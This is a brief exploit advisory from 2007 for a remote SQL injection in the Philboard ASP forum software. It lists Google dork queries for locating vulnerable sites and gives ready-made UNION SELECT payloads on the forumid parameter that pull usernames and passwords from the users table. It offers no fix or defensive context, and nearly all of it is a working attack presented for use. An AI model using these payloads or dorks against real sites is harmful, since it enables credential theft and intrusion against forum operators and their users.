philboard-sql.txt
Posted on 13 February 2007
---------------------------------------------------- Philboard (id) Remote SQL Injection ---------------------------------------------------- Bulan: xoron xoron.info - xoron.biz Google Dork : "Powered by Philboard" , "inurl:philboard_forum.asp" ---------------------------------------------------- Exploit: philboard_forum.asp?forumid=[SQL] ---------------------------------------------------- Example: Username philboard_forum.asp?forumid=-1+union+select+0,username,2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16,17,18+from+users Password philboard_forum.asp?forumid=-1+union+select+0,password,2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16,17,18+from+users ---------------------------------------------------- Forum: username + password ---------------------------------------------------- Download: open http://www.aspindir.com/indir.asp?id=3538 and click "Ýndirmek için týklayýn" . ----------------------------------------------------